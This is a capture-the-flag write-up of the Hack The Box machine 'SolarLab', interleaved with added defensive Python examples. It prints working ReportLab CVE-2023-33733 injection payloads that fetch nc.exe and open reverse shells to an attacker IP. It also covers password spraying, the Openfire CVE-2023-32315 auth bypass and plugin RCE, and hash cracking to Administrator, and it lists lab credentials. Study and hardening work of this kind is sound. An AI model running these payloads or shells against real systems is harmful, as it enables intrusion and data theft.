Solar Lab
OS: Windows
Difficulty: Medium
Points: 30
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.245.145 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.245.145
Nmap scan report for 10.129.245.145
Host is up, received echo-reply ttl 127 (0.20s latency).
Scanned at 2024-05-11 20:42:53 EDT for 58s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.24.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
6791/tcp open http syn-ack ttl 127 nginx 1.24.0
|_http-server-header: nginx/1.24.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumeration
We add the domain and the subdomain to our hosts file.
echo "10.129.245.145 solarlab.htb report.solarlab.htb" >> /etc/hosts
A share named Documents is exposed over SMB.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient -L 10.129.245.145
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.245.145 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
We can access the share.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# smbclient //10.129.245.145/Documents
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1895172 blocks available
smb: \>
We download the file details-file.xlsx.
smb: \> get details-file.xlsx
getting file \details-file.xlsx of size 12793 as details-file.xlsx (21.4 KiloBytes/sec) (average 21.4 KiloBytes/sec)
We see that it contains usernames and passwords.
User Enumeration
The web page http://report.solarlab.htb:6791/login has a login form. The page returns a different message depending on whether the username exists or not, which lets us enumerate valid users.
Once we have the usernames we can do password spraying.
The account blakeb lets us in.
blakeb : ThisCanB3typedeasily1@
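The enumeration oracle above comes from the login handler answering "user not found" and "wrong password" differently. As an added example (not code from the box or the writeup), the two handlers below show the leaking pattern beside a uniform one; the user store, salt and password are constructed for the demo and the hash function is illustrative only.

```python
import hashlib
import hmac
import secrets


def _digest(salt: bytes, password: str) -> bytes:
    # Illustrative salted hash; a real service would use a slow KDF (argon2, bcrypt, scrypt).
    return hashlib.sha256(salt + password.encode("utf-8")).digest()


# Constructed user store for the example: username -> (salt, digest).
# The password is made up here and is not one of the box's credentials.
_SALT = b"constructed-example-salt"
USERS = {
    "alice": (_SALT, _digest(_SALT, "correct horse battery staple")),
}

# A record that can never match a submitted password, used so that a request
# for an unknown user performs the same hashing work as one for a known user.
_DUMMY = (_SALT, _digest(_SALT, secrets.token_hex(32)))


def login_verbose(username: str, password: str) -> str:
    """The enumeration oracle: the response text differs by whether the user exists."""
    record = USERS.get(username)
    if record is None:
        return "User not found"
    salt, digest = record
    if hmac.compare_digest(_digest(salt, password), digest):
        return "OK"
    return "Incorrect password"


def login_uniform(username: str, password: str) -> str:
    """Hardened: one failure message and one code path regardless of the username."""
    salt, digest = USERS.get(username, _DUMMY)
    matched = hmac.compare_digest(_digest(salt, password), digest)
    if matched and username in USERS:
        return "OK"
    return "Invalid username or password"


if __name__ == "__main__":
    for fn in (login_verbose, login_uniform):
        print(fn.__name__, "|", fn("nobody", "x"), "|", fn("alice", "x"))
```

The uniform handler also removes the timing difference (a missing user still costs one hash), which is the second way a login form leaks existence. Per-account lockout or rate limiting is what blunts the spraying step that follows on this box.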
ReportLab RCE (CVE-2023-33733)
After testing all the functionality we notice that the application generates PDFs with the ReportLab library.
We identify that this library has an RCE vulnerability.
https://github.com/Sudistark/BB-Writeups/blob/main/2023/CVE-2023-33733-rce-via-htmli-in-reportlab.md
Through testing we found that the Travel Approval function lets us exploit this vulnerability, but only through the travel_request parameter, since the other parameters have some restrictions.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.245.145 - - [11/May/2024 22:49:02] "GET / HTTP/1.1" 200 -
With this we can get a reverse shell. First we create a folder into which we will download nc.exe.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('mkdir c:\\temp') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
We download the binary into that folder.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl 10.10.14.218/nc.exe -o c:\\temp\\nc.exe') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
Then we launch the reverse shell.
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('c:\\temp\\nc.exe -e cmd.exe 10.10.14.218 1234') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">exploit</font></para>
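The bug above works because the travel_request text is interpolated straight into Paragraph markup, so a crafted color attribute reaches ReportLab's evaluator. The real fix is upgrading ReportLab to a release that patched CVE-2023-33733 (3.6.13 or later); the code below is an added example, not from the box or the writeup, of the application-side control that should have been there regardless: user text is escaped so it can only ever be text, the colour attribute is allowlisted, and a helper flags submissions that carry markup for logging. The function names and the sample input are assumptions made for this demo.

```python
import re
from xml.sax.saxutils import escape

# Allowlist for anything that reaches a <font color="..."> attribute: a colour
# name or a #rgb / #rrggbb hex value. Expressions, brackets and quotes never match.
_COLOR_RE = re.compile(r"(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}|#[0-9A-Fa-f]{6})")


def safe_color(value: str, default: str = "black") -> str:
    """Return the colour unchanged only if it is a plain name or hex literal."""
    return value if _COLOR_RE.fullmatch(value) else default


def build_paragraph_markup(user_text: str, color: str = "black") -> str:
    """Wrap user-supplied text in Paragraph markup so it can only ever be text.

    escape() converts &, < and > to entities, so a field such as travel_request
    cannot open a <font> or <para> tag of its own. The colour attribute is
    validated separately and has double quotes escaped as well.
    """
    text = escape(user_text)
    attr = escape(safe_color(color), {'"': "&quot;"})
    return f'<para><font color="{attr}">{text}</font></para>'


_TAG_RE = re.compile(r"<\s*/?\s*(?:para|font|a|b|i|u|img|span|br)\b", re.IGNORECASE)


def looks_like_markup(user_text: str) -> bool:
    """Detection helper for request logging: a plain-text form field that
    contains Paragraph tags is worth an alert even when rendering is hardened."""
    return _TAG_RE.search(user_text) is not None


if __name__ == "__main__":
    sample = 'Trip to <font color="red">Berlin</font>'  # constructed input
    print(looks_like_markup(sample))
    print(build_paragraph_markup(sample))
```

The allowlist is deliberately narrower than what ReportLab accepts; a form that only ever needs a handful of colours should map them from a fixed choice on the server rather than pass a client-supplied string through at all.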
Lateral Movement
Once inside the machine we identify that Openfire is installed.
c:\Program Files>dir
dir
Volume in drive C has no label.
Volume Serial Number is 385E-AC57
Directory of c:\Program Files
05/03/2024 02:34 PM <DIR> .
05/03/2024 02:34 PM <DIR> ..
11/16/2023 10:39 PM <DIR> Common Files
04/26/2024 04:39 PM <DIR> Internet Explorer
11/17/2023 11:04 AM <DIR> Java
11/16/2023 10:47 PM <DIR> Microsoft Update Health Tools
12/07/2019 12:14 PM <DIR> ModifiableWindowsApps
11/17/2023 03:22 PM <DIR> Openfire
Port Forwarding
We will set up a port forward with chisel to reach the Openfire port. We download the program onto the machine.
python3 -m http.server 80
curl 10.10.14.105/chisel.exe -o c:\temp\chisel.exe
We create the tunnel as follows.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# /opt/linux/chisel server -p 5555 --reverse
2024/05/11 23:27:38 server: Reverse tunnelling enabled
2024/05/11 23:27:38 server: Fingerprint TOEwBCujyzAMJQGNMI8GuRRNJUqUJzmvpWlm/zVbC08=
2024/05/11 23:27:38 server: Listening on http://0.0.0.0:5555
2024/05/11 23:28:31 server: session#1: tun: proxy#R:9090=>9090: Listening
c:\temp>chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
chisel.exe client 10.10.14.218:5555 R:9090:127.0.0.1:9090
2024/05/12 06:28:30 client: Connecting to ws://10.10.14.218:5555
2024/05/12 06:28:31 client: Connected (Latency 167.5984ms)
Now we can reach the portal.
OpenFire Auth Bypass (CVE-2023-32315)
In our initial research on Openfire we identified that we can obtain RCE, as described in the following resources.
https://github.com/miko550/CVE-2023-32315
https://vulncheck.com/blog/openfire-cve-2023-32315
https://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT
We create a random user.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# python3 CVE-2023-32315.py -t http://127.0.0.1:9090
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗███████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ╚════██╗╚════██╗╚════██╗███║██╔════╝
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝ █████╔╝ █████╔╝╚██║███████╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚═══██╗██╔═══╝ ╚═══██╗ ██║╚════██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██████╔╝███████╗██████╔╝ ██║███████║
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝
Openfire Console Authentication Bypass Vulnerability (CVE-2023-3215)
Use at your own risk!
[..] Checking target: http://127.0.0.1:9090
Successfully retrieved JSESSIONID: node01rz9bs7xhmxrf13l0fomzxgetx1.node0 + csrf: holx9y5uZIvsaGw
User added successfully: url: http://127.0.0.1:9090 username: i78j4t password: 5vsjyv
With those credentials we can log in.
OpenFire RCE (CVE-2023-32315)
Now we obtain RCE as follows. First we download the openfire-management-tool-plugin.jar plugin and upload it in the Plugins section.
Once the plugin is uploaded, we go to Server Settings and select the Management Tool option.
It asks for a password, which is 123, and we get in. Then we select the system command option to run commands.
We get a reverse shell.
c:\temp\nc.exe 10.10.14.218 4444 -e cmd.exe
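Both Openfire steps above (the console auth bypass and the plugin upload) leave traces in whatever HTTP request log sits in front of the admin console on 9090. As an added example, not code from the box, the writeup or the Openfire project, the scanner below normalises request paths (decoding percent and %uXXXX escapes repeatedly and dropping ';' path parameters, since matching the raw string misses disguised traversal) and flags traversal, hits on the setup wizard of an already installed server, admin user creation and plugin uploads. The log lines, addresses and timestamps are constructed for the demo.

```python
import re
import urllib.parse
from dataclasses import dataclass

# Common log format, e.g. from a reverse proxy or a Jetty request log in front
# of the Openfire admin console (port 9090). The query string stays on the path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


@dataclass
class Finding:
    ip: str
    ts: str
    reason: str
    path: str


def normalize_path(raw: str) -> str:
    """Reduce a request path to a canonical form before matching.

    Percent escapes (and the %uXXXX form some Java servers accept) are decoded
    repeatedly so double encoding cannot hide '..', and ';param' segments
    such as ;jsessionid=... are removed.
    """
    path = raw.split("?", 1)[0]
    for _ in range(3):
        path = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), path)
        path = urllib.parse.unquote(path)
    return re.sub(r";[^/]*", "", path)


def classify(method: str, path: str):
    """Return a reason string for a suspicious admin-console request, else None."""
    if "/.." in path or path.endswith("/.."):
        return "path traversal in admin console request"
    if path.startswith("/setup/"):
        return "setup wizard reached on an already installed server"
    if method == "POST" and path.endswith("/user-create.jsp"):
        return "admin user creation"
    if method == "POST" and path.endswith("/plugin-admin.jsp"):
        return "plugin upload"
    return None


def scan_access_log(lines):
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in common log format
        path = normalize_path(m["path"])
        reason = classify(m["method"], path)
        if reason:
            findings.append(Finding(m["ip"], m["ts"], reason, path))
    return findings


# Constructed sample lines; the addresses and timestamps are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2024:06:30:01 +0000] "GET /login.jsp HTTP/1.1" 200 1234',
    '10.0.0.5 - - [12/May/2024:06:30:05 +0000] "GET /setup/%2e%2e/user-create.jsp HTTP/1.1" 200 5678',
    '10.0.0.5 - - [12/May/2024:06:30:09 +0000] "POST /plugin-admin.jsp?uploadplugin HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.reason}: {f.path}")
```

A plugin upload or user creation is legitimate when an administrator does it, so these two findings are best correlated with change tickets and with new jar files appearing under the Openfire plugins directory; the traversal and setup-wizard findings have no benign explanation on a server that has finished installation.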
Privilege Escalation
With winPEAS we can obtain an NTLMv2 hash, which we then crack.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
HotP!fireguard (openfire)
1g 0:00:00:13 DONE (2024-05-12 00:01) 0.07530g/s 835855p/s 835855c/s 835855C/s Howla8@hotmail.co.uk..Honey40
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
We verify that we have access.
┌──(root㉿kali)-[~/htb/Box/SolarLab]
└─# crackmapexec smb 10.129.245.145 -u 'openfire' -p 'HotP!fireguard'
SMB 10.129.245.145 445 SOLARLAB [*] Windows 10 / Server 2019 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.129.245.145 445 SOLARLAB [+] solarlab\openfire:HotP!fireguard
Administrator : ThisPasswordShouldDo!@
impacket-psexec Administrator@10.129.245.145